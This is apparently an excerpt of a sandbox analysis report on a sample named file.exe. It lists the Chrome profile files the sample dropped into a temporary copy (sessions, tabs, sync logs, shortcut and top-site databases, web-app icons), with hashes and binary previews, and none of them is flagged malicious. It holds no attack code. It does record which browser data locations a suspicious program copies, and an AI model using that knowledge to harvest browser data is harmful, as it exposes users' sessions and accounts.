          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
          Malicious:false
          Preview:.|.."....leveldb.BytewiseComparator......

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions\Session_13340965317813669

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2678
          Entropy (8bit):3.1114451652459114
          Encrypted:false
          SSDEEP:24:3Zl+L5w9ulifloLligUlEAEgvnlia5nH0VgXXxDkd95d2nuCCVBJT55:3Zl+69gisigUlqwiEnH0C1kd9TUu5lD
          MD5:223D6FD3E24E9F2A77A3791E3C7056ED
          SHA1:1E14C7483555223534F4A70EC861502BCAB04CF9
          SHA-256:A9259CD6402BC6F91F03966B238602C8D07331F565D8052B809D9E4B42BA41CF
          SHA-512:D2AA2FAAEC5A1F86BB37192E09810D3028ACFB4C1CF7178F18E17F8C705C91967A90B2D9FF3C10D83F42AB9DC7C8B924713FC8DB3BDDDE303643114225F60AE4
          Malicious:false
          Preview:SNSS..........H..............H..............H...... ...H..........H..........H....!.....H..................................H...H1..,......H$...1e05142b_c25e_4073_8449_2828bdea3287......H..........H.......[..........H......H....5..0......H&...{B47FAB60-AE2E-44B3-B8D1-B905DCF5A78F}.... ...H..........H....................1..,......H........chrome://newtab/....N.e.w. .T.a.b...........!........................................................................................................s.B.....s.B............................@.......................................................4.......c.h.r.o.m.e.:././.n.e.w.-.t.a.b.-.p.a.g.e./.....................................8.......0.......8....................................................................... ...............................................................................................8...............0........s.B.....s.B....p.......................................................@...............................a.b.o.u.t.:.b.l.a

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions\Session_13340965342984957

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2793
          Entropy (8bit):3.171076067185925
          Encrypted:false
          SSDEEP:48:3ZlT9NEi2iFOyRZCZi2nH0C3LYHLNl3rW9FYgfn:3bVfC5YH2o0
          MD5:398E5DAED90DF80CCEC434EB3AF6BE6E
          SHA1:CBCA2102AC2AB0A7CBE4BC5D9FE0758344236AC7
          SHA-256:F8E484D1D09EB88E631CB32EA34503559B287CBC44179B6CF722AD3D6DF3BAF9
          SHA-512:329B7C204B0458EB21B39F6A02827F2B9FFE59B3094E5673BC52AB0DD93F827F6AA9DAAF12D7ECA3FCAF8B19116B8A8E696D122053AB203175DC13691E81262B
          Malicious:false
          Preview:SNSS..........H..............H..............H...... ...H..........H..........H....!.....H..................................H...H1..,......H$...125598d6_ddbf_4957_8adf_1bfbf0265dd1......H..........H.......]..........H......H....5..0......H&...{B47FAB60-AE2E-44B3-B8D1-B905DCF5A78F}.... ...H..........H....................1..,......H........chrome://newtab/....N.e.w. .T.a.b...........!.........................................................................................................C......C............................@.......................................................4.......c.h.r.o.m.e.:././.n.e.w.-.t.a.b.-.p.a.g.e./.....................................8.......0.......8....................................................................... ...............................................................................................8...............0.........C......C....p.......................................................@...............................a.b.o.u.t.:.b.l.a

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions\Tabs_13340965317929160

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):917
          Entropy (8bit):3.0657070649853586
          Encrypted:false
          SSDEEP:12:33hxFVtDk7pkkv/Kkn/TSGwl7dlkP3YenLc7:3xjnEx/HomzL6
          MD5:6C043880EFC9263EDA6FA105D66C7358
          SHA1:8DC81C82743FBA00CBCF3B00314108A06A642668
          SHA-256:87E28B995A8A79071EDF981240A877CBF3569C317DE69612B2E05B1D3F6FBEDE
          SHA-512:045072EF812C0D3D45B98C443F9C6250029D88C4D4DD3AA348B12CF93F3648FDD3C5625749FD1FCB7FB152D04D61A91449ECBA6EF4B65A9D890B95D78A0AF7F7
          Malicious:false
          Preview:SNSS..........H.....P...e/.u..p......H........chrome://welcome/.......W.e.l.c.o.m.e. .t.o. .C.h.r.o.m.e...........!........................................................................................................8.A.....8.A....H.......`.......`.......p.......................................................*.......c.h.r.o.m.e.:././.w.e.l.c.o.m.e./...............................................<........................o".route".landing".step".landing{..............8.......0.......8....................................................................... ...............................................chrome://welcome................P...$...0.7.e.5.0.5.1.1.-.3.6.5.b.-.4.1.b.8.-.a.8.d.1.-.d.1.f.c.3.b.6.2.a.0.e.0.................P...$...f.e.b.1.5.a.8.5.-.b.4.d.8.-.4.f.5.c.-.a.1.d.5.-.8.6.3.2.a.c.7.b.8.a.b.e.....................chrome://welcome/........4[..e/..................tY..e/..........tY..e/........

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions\Tabs_13340965343135326

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):917
          Entropy (8bit):3.0657070649853586
          Encrypted:false
          SSDEEP:12:33hxFVtDk7pkkv/Kkn/TSGwl7dlkP3YenLc7:3xjnEx/HomzL6
          MD5:6C043880EFC9263EDA6FA105D66C7358
          SHA1:8DC81C82743FBA00CBCF3B00314108A06A642668
          SHA-256:87E28B995A8A79071EDF981240A877CBF3569C317DE69612B2E05B1D3F6FBEDE
          SHA-512:045072EF812C0D3D45B98C443F9C6250029D88C4D4DD3AA348B12CF93F3648FDD3C5625749FD1FCB7FB152D04D61A91449ECBA6EF4B65A9D890B95D78A0AF7F7
          Malicious:false
          Preview:SNSS..........H.....P...e/.u..p......H........chrome://welcome/.......W.e.l.c.o.m.e. .t.o. .C.h.r.o.m.e...........!........................................................................................................8.A.....8.A....H.......`.......`.......p.......................................................*.......c.h.r.o.m.e.:././.w.e.l.c.o.m.e./...............................................<........................o".route".landing".step".landing{..............8.......0.......8....................................................................... ...............................................chrome://welcome................P...$...0.7.e.5.0.5.1.1.-.3.6.5.b.-.4.1.b.8.-.a.8.d.1.-.d.1.f.c.3.b.6.2.a.0.e.0.................P...$...f.e.b.1.5.a.8.5.-.b.4.d.8.-.4.f.5.c.-.a.1.d.5.-.8.6.3.2.a.c.7.b.8.a.b.e.....................chrome://welcome/........4[..e/..................tY..e/..........tY..e/........

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Shortcuts

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):0.44194574462308833
          Encrypted:false
          SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
          MD5:B35F740AA7FFEA282E525838EABFE0A6
          SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
          SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
          SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\000003.log

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):8912
          Entropy (8bit):5.915432507878918
          Encrypted:false
          SSDEEP:192:HhXhxpn+xOQwLwRRxsrEx1dxr+XwLwRRxPngVdrSJrExcxM1OA0hxMledmxdxsSg:HhXhLn+wQQaRmgPdh+XQaRBJgJ0hL+d4
          MD5:93788673DB97D1D9891F3D3252D462F0
          SHA1:B87B39B4C9983B1BCE3053A0CC9FB935DE086804
          SHA-256:EF926D00C8C7593ADDD84FAD9228F8706E29817D42BA90DB008B3C9F9EBD3F45
          SHA-512:4393C13CECA81EA78CA6FEACC4ADB55ABCA7B6A26D6B8E4893D999E7DD61D1C364B53B5C0B0C0CC6C90A1B6E13D4CC8CE373C00CDB12F79AE55118A72062705D
          Malicious:false
          Preview:...n'................_mts_schema_descriptor...9.1.z...............,web_apps-dt-fmgjjmmmlfnkbppncabfkddbjimcfncm...x.2https://mail.google.com/mail/?usp=installed_webapp..Gmail..*.https://mail.google.com/mail/J.mail/?usp=installed_webapp..Gmail".(.2.https://mail.google.com/mail/:....... .(.0.8.@.H.P.@.H.X X0X@X`X..X..X.........1..........................C...=https://mail.google.com/mail/installwebapp?usp=chrome_default...........6k..................,web_apps-dt-mpnpojknpmmopombnjdcgaaiekajbnjb......6https://docs.google.com/document/?usp=installed_webapp..Docs..*!https://docs.google.com/document/J.document/?usp=installed_webapp..Docs".(.2!https://docs.google.com/document/:....... .(.0.8.@.H.P.@.H.X X0X@X`X..X..X........1..........................G...Ahttps://docs.google.com/document/installwebapp?usp=chrome_default............X/.t...............,web_apps-dt-aghbiahbpaijignceidepookljebhfak...V. https://drive.google.com/?lfhs=2..Google Drive..*.https://drive.google.com/J.?lfhs=2..Google D

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\CURRENT

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):16
          Entropy (8bit):3.2743974703476995
          Encrypted:false
          SSDEEP:3:1sjgWIV//Uv:1qIFUv
          MD5:46295CAC801E5D4857D09837238A6394
          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
          Malicious:false
          Preview:MANIFEST-000001.

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\LOG

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):332
          Entropy (8bit):5.2370041525935225
          Encrypted:false
          SSDEEP:6:kuA0+q2PcNwi23iKKdKpIFUtjAUZmwxA0VkwOcNwi23iKKdKa/WLJ:kuAJvLZ5KkmFUtjAU/xAU54Z5KkaUJ
          MD5:DFCA1ED68504C3D2D266909306705EC8
          SHA1:3367B05F8A97B707814BF2D63B84AC6B988F1382
          SHA-256:FFF2EF110723332EA62A25339F42C10A6D6B546ED2616FB79627C0A40C84C13C
          SHA-512:E5863FD6AD9319924B15002A846279C012BA6A4BB402E86D21D68A70730D8AF8EDAFCAEF5BE95C527645C3D451EFC7811552CF3912090680FF907168ECE6D900
          Malicious:false
          Preview:2023/10/05-08:51:52.919 1d38 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2023/10/05-08:51:52.919 1d38 Recovering log #3.2023/10/05-08:51:52.919 1d38 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\LOG.old

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):332
          Entropy (8bit):5.254923385102867
          Encrypted:false
          SSDEEP:6:kusuZq2PcNwi23iKKdKpIFUtjsukZmwxsuEkwOcNwi23iKKdKa/WLJ:kuxZvLZ5KkmFUtjxk/xxE54Z5KkaUJ
          MD5:7E7A1B3F195B4CC8895D2C84F3852E31
          SHA1:7FA5E1CED9866C91D0B5B416E47996E67F1D6093
          SHA-256:8508B21913D56517810A5E0EE29BBCEECE9CAB2F625B301A8479D43162E5E5E9
          SHA-512:5415AB4AFA57A3B479D5F26DA78781023DB6B4A2707035C71AEF7F462611B4A9B2B6B238B477948085DFE05E32BE4932B086F568F8A2113FDC4451394C588161
          Malicious:false
          Preview:2023/10/05-08:51:49.478 1e50 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2023/10/05-08:51:49.478 1e50 Recovering log #3.2023/10/05-08:51:49.478 1e50 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sync Data\LevelDB\MANIFEST-000001

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:OpenPGP Secret Key
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.704993772857998
          Encrypted:false
          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
          Malicious:false
          Preview:.|.."....leveldb.BytewiseComparator......

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Top Sites

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):0.37202887060507356
          Encrypted:false
          SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOS2Rccog2IccogL:TLiwCZwE8I6Uwcco5fB2r2oL
          MD5:4D950F6445B3766514BA266D6B1F3325
          SHA1:1C2B99FFD0C9130C0B51DA5349A258CA8B92F841
          SHA-256:765D3A5B0D341DDC51D271589F00426B2531D295CCC2C2DE10FDD4790C796916
          SHA-512:AD0F8D47ABBD2412DC82F292BE5311C474E0B18C1022CAAE351A87ECD8C76A136831D4B5303C91DF0F8E68A09C8554E378191782AA8F142A7351EDB0EEF65A93
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Visited Links

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):131072
          Entropy (8bit):0.002095330713584969
          Encrypted:false
          SSDEEP:3:ImtViiPv:IiVt
          MD5:18D9C8BFC1F07DC9FD377995F0D40AED
          SHA1:6DFA525DE6C588B448A0600340AEA3BF7458E0A2
          SHA-256:172FDAC126FA79213A158CD5CCD391D813710BCF22F337146930EAE905EBCAF1
          SHA-512:71C61614A38021618099036164575D0BAC2067FB76E71F67DF2AB73824077E1F056B65F6845307A4686669BDB9B42C57A7309F171257B746977450E5A283CEA2
          Malicious:false
          Preview:VLnk.....?.......k.l...*................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.ico

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
          Category:dropped
          Size (bytes):170408
          Entropy (8bit):4.700736115175864
          Encrypted:false
          SSDEEP:768:JGMkerPbmDFFwAkpeaWCSj8BbUZh5g2i4GhuPD23W1qG+WflTnKM1+Oug7S1ws17:JTTLexkpDWnIwqDYL2G1xD3hC92WdH1N
          MD5:11EB9052FA3E4755FFC9E2E718429CB5
          SHA1:6ADE41E280A7C5B3DD48228189BE3D6724BED1B4
          SHA-256:F1894DCF1859D4D0EA121BAE0C0976F368DB4ACBE30CBAF3B1836F03FA431B16
          SHA-512:E33733FCAEC08300CB004767379F0470582ECAD55D755937A2919B03FAAD5333987C74D33E1819A57311CED57AEC22242AA08EA6FCB73D350B342576982078C4
          Malicious:false
          Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ..L...M..(............. ...............................F...G6..>1..D1..B6.. ......7...l ...B...C...A...E.dN.. ....t...t...|0...H...3.q..$S../[.].1sY.5.U.3...Y..............r....P.3.Z.;.X.#}....................R./AX.7.N.*............A............R.7.G...(.`.....................<...9..Z9..Z..q.........................................(............. ...................................N..0..w3..w3..@..................l.a..>...E...A...D...:..g.5H.`.....P. .a...p%...F...G...I...8.~T..+5..M....."...#..."..9...G...9...z..p..%r.."u..D.4@J.6.M.6.E.2........................?....W.2.X.5.Y.9.f..U...a....................N.'.T.5.U.5.R.0.............................R.2vY.;.E.....|........u.....U..........@. .N...:...6............................... p..:..5:..5<i................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.ico.md5

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:Non-ISO extended-ASCII text
          Category:dropped
          Size (bytes):16
          Entropy (8bit):4.0
          Encrypted:false
          SSDEEP:3:zVZum:5x
          MD5:AEC0EF4D4CEFA7D6057327E4A8CA69A3
          SHA1:1B69876DEC8A9EE8DC35842708EACF73D323266B
          SHA-256:47075E9D8C3B5977D8D52C16AC3D5170D952179E85DB30187956C8413D35F423
          SHA-512:408C3910E44E2A1CD1DADD3F637CD49DB0DE252E71621747AD999790D2D77723373237199C8D2ACA771E1926C64D0A561823C51C04EB4B05832991F4690B0505
          Malicious:false
          Preview:..............f

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.ico

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
          Category:dropped
          Size (bytes):176153
          Entropy (8bit):5.269245949919283
          Encrypted:false
          SSDEEP:3072:tNjOVz1os/Icu/zejqqqqqIqqnqqvqqzFW3qvOkY6KOHiq0ZPqckQcqjc1+ahORL:tVOVzd/IUjqqqqqIqqnqqvqqzFW3qvOz
          MD5:01A9608FA54A2550EA90ED0A63888D58
          SHA1:4C3BC533FDF109625BFCCA07DF8F6CD0A4A42836
          SHA-256:168C206845754DB457AAEF9117F1FA12DC774F1B75502F0DF2FF3FBD695968C1
          SHA-512:99B14E517AEF86277141A9A9FE34DD44158DD3FEA825B66EE940F0B188F12CE83137A0BC42FCB7F8DC348A3E1BD1B50E655B2B1AC1EC22444165B6A22091C526
          Malicious:false
          Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ..b...M..(............. ......................................................... *.g"*..(..&...*...$...#..".i#,..%...%...$........&...&..."..&0..&/..!*...........*...$...#..)2..(1..#-.........."+...%...$..,5..,6..+5..(2.......)...)...$..18.h.8.)3.&1..*2..#,. *..'.h................................................................(............. .................................................................. ..!+.^.(.s.(.y.).|.%.}.$.z.!.s.#.`...."+..$/..#-.. +...$..",...)...%...%..."..$...%-..!*..,4..AI.......!...&...#..."..%/..&0.. *..5>..........7A..."...%..."..(1..(2..!+..6?..........8A...#...%..."..+4..*3..&/..09..BJ.......$...)...%...#../9..0:..,6..(2..!,..)2..$... +...)...&..5@..2:.`,7.s,4.z.6.{'2.{&..z#,.s#-.`.)............................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.ico.md5

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:OpenPGP Public Key
          Category:dropped
          Size (bytes):16
          Entropy (8bit):4.0
          Encrypted:false
          SSDEEP:3:blAmn:blAmn
          MD5:467AA32B073890152C542DCF88545EB4
          SHA1:91ACA28632A8EF9B91626342FFED20C60C7AA3F5
          SHA-256:29EF0A4FBA615380CAF09AF9228D7E8A191AAA817655AB7E894C9496FE0BA4D6
          SHA-512:48A1C21AD5CE15EA88A91D3B42F2DDA867A6714CD72AFDE05BC6F7FA6BD4DACDFE4ACE62812037AFD6122A9E3455E178418BE80BBCE631D80C4788A83DFB6C57
          Malicious:false
          Preview:..m..R...u%.P

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.ico

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
          Category:dropped
          Size (bytes):156005
          Entropy (8bit):3.9419007592660393
          Encrypted:false
          SSDEEP:1536:3zDNlXnPsf/d/Gn+E9rdL9rdL9rdL9rdL86tw:1+Un+E9rdL9rdL9rdL9rdL86tw
          MD5:B6222BE0D5F8AB18FA104FC1D88E3824
          SHA1:4EFF5078405F357FD2E4C866060D4115B02F7484
          SHA-256:387133071D04972F74F0722F2EA05F672E15176C2D0907B17F1804EACF886B00
          SHA-512:8BF5FA4FED13F02469F9B59CB979E5499761F8D338B48C6666F8DD4686DDECD840A467DC4EB55290535C949E8099A596513C860F9AAAD231832DC1202CE580C5
          Malicious:false
          Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ .G....M..(............. .............................T.2gZ.8.V.7.V.7.Z.8.U.2f........S.4.V.3.N...N...V.3.T.4.........N.-...t.........t.N.-.........N.-.............N.,.........N.,.............O.-.........S.4.Y.8.W.9.U.8.T.2.M.-.........S.4.[.8.T.4.O.-.6...2..$........S.2fW.7.U.6.Q./.2x.$........................................(............. .............................P.,#W.5.U.4.V.5.V.5.U.4.W.5.S.-"........U.2W[.9.Q.1.Q.0.Q.0.Q.1.[.8.R.2W........U.1TW.7.a.F.d.H.d.H.a.F.W.7.U.1T........C..Tp.T.............p.T.C..T........?..Uv.Z.............v.Z.@..T........B..Ur.U.............r.V.D..S........U.1TX.7.g.L.j.O.i.N.h.N.Z.9.R.0Z........R.1TV.7.L.-.M.-.J.+.=...A...I.$*........R.2W[.9.U.6.W.7.V.5.;...,q.4............S.-"W.5.S.4.T.5.U.3.=..6..............................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.ico.md5

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):16
          Entropy (8bit):3.875
          Encrypted:false
          SSDEEP:3:h50o1UD:h50oc
          MD5:640918E14491FFB774011C8377B4951D
          SHA1:88DBD12BD9FD9CB4A596A47CDEEF05A3AD79831D
          SHA-256:F030B7CD231680897E8188F57127350F640A0879E00124302905462E89B36F02
          SHA-512:7ED6033854E3CE3DFA7602E5EDF47ED765992E63268B8E89AA4CB4DE3D4578A1B0DF2769F9B5D19AC1692AA9EB0BD7D1A42C372EE49A61C6D409D3928A0A13B2
          Malicious:false
          Preview:.[..r....X..l...

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Gmail.ico

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
          Category:dropped
          Size (bytes):163045
          Entropy (8bit):4.056629874451662
          Encrypted:false
          SSDEEP:1536:xvsclK+vGZ6PZI2NHyoMbhKw72RQKdfCh2ERZhTKyzr3WndlP9XMbo:xvUQdldMbo
          MD5:D3275657E335282C62F6C7EDA79BED0B
          SHA1:75D2A3712A7A5BD967145854B8DF767B093CCCEC
          SHA-256:9AB5DC1985DEB70DCEE5B102FA386EEEB4737DB676939E30EFDC8E0B3E3C6F77
          SHA-512:446C99997E9F39888A371CEADB0C08F35F5BA4BF79F88645B43C9164AF82967731E84C0EAC2B05DC25DA7DD2E01E4ABAADF1D69730735EB85B3A39FF6A0B7FBC
          Malicious:false
          Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ../...M..(............. ...........................................................Bi..A..jU.........@.@.R.3.V.3h..C...F..M..#:...:..3...T.8.T.3...C...4.YN.H1A..4B..6S.GW.$.T.4...;..]}..?..5D..5@..0K..3...V.*.C1...$..1@..4G.638.71L............v"$.+9...........U.........z................................................................(............. ...................................................................>!..DZ.=*....@@...@......O.1*Y.6YM..!..C...M...B.................R.3.a.<.T.3...B...J..@x....:E.\5E.\....Q.1x[.;.S.3..F...D...=~.5.}:F..7G..-3.}U.(~^.2.R.9...3..~N.OC..1D..6D..5F..7<..)}..J.I.\....Z~.4*...-..9H..1@.c4H.c::..........1.......!..,2..4G.6........=*.6............$$.+!#.t.............U.............t...*..........................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm\Gmail.ico.md5

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:Non-ISO extended-ASCII text, with no line terminators
          Category:dropped
          Size (bytes):16
          Entropy (8bit):4.0
          Encrypted:false
          SSDEEP:3:dPG9Crn:T
          MD5:DDCB0EDB4914083717623BD31267A833
          SHA1:C9E967F5F99DCEBBA98382E6B3EB10536E610D13
          SHA-256:29D0D3A34922861C320AE736377269C93EF6337DBB55B7E1540639E3BB9CC550
          SHA-512:A9F070275DABFAA8064595E893F743897E2A71220396F955E79615CBAE88D10AB98408DA76E16270598400465584EA8B12A1A7C79CDF6C79AC889B17B67EDA16
          Malicious:false
          Preview:..J.Gc,o..S....

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Slides.ico

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
          Category:dropped
          Size (bytes):154855
          Entropy (8bit):3.412003561063223
          Encrypted:false
          SSDEEP:384:SvNTEpq0LOIkXLZ54PBNiaN0BV1AjcpGW9oYpiqvPQFrpeJMBUp4CrOgvwAxWK2a:Svtcq0LrkX2sbuPFrsHZBEizq99HI
          MD5:962D04872C9B7BD685A8E238733261E1
          SHA1:D7B961CBDCC837860049985D28D8758CE6207E88
          SHA-256:1704E31D6D541BC10B2EE4BDBC66650F73848FEC97BCDB4E2E77E95278083046
          SHA-512:D163347B9D5E3008505E046152E99C01ED3BD7BD80939475720C54589404E16E42A74A8C001F955C59DB882A1914F43301384A1C554C361828D86D0251E161B5
          Malicious:false
          Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ......M..(............. ................................g...................f............................................E...e...e...E...................~...$...$...~...................k..._...^...l......................................................................$...........f...............$........................................(............. ................................#..........................."...........W...........................W...........T...........................T...........T ................... ......T...........U<...m...........m...<......T...........U,.......h...i.......,......S...........T....&...-...-...&..........Z...........T...........................*...........W.......................4..............."...................6..............................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Slides.ico.md5

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):16
          Entropy (8bit):4.0
          Encrypted:false
          SSDEEP:3:wN:2
          MD5:693E24BF24763643587FC35CDF09F036
          SHA1:C8E663405C04E735EA96755D8591C3D681B02E4A
          SHA-256:F7395A68AE82EB7609BE1FCC375C6E484EDAB32220EB6403C3E58033A39F740A
          SHA-512:786CEB64A9BA03D1EB453F65C82DF73475763241EA4A2DFE5AFEEEB2F148A171088D14761F6384704A7F6C340ED80F6CDA8102D9F279C5E5CCFE69BC988083F2
          Malicious:false
          Preview:e._.".;...Yft

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Docs.ico

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
          Category:dropped
          Size (bytes):155383
          Entropy (8bit):3.7636223373910633
          Encrypted:false
          SSDEEP:768:2TIJLBiw5jT////MvDPmaWQ73TLbL73TLHLogKeTzPGEn5uPajYHNJ666au:2TI/i7nU6b
          MD5:68960FAA72FFAC468AE43B5123C54D73
          SHA1:56F660D4EB84EE9793341B6E435F172B1A142E28
          SHA-256:6B250CEA2BC861221FBB43DE55AB4F64B6AA23E442135288CA5D83334986A368
          SHA-512:88E8EE94277234FA1DB73AEE7CBB468AD1509542DBF9F79B128AFEF727E589B37B3946219C1612D64A20EA043AE73FF42BA87A55B402FF1490B03D4DD240E104
          Malicious:false
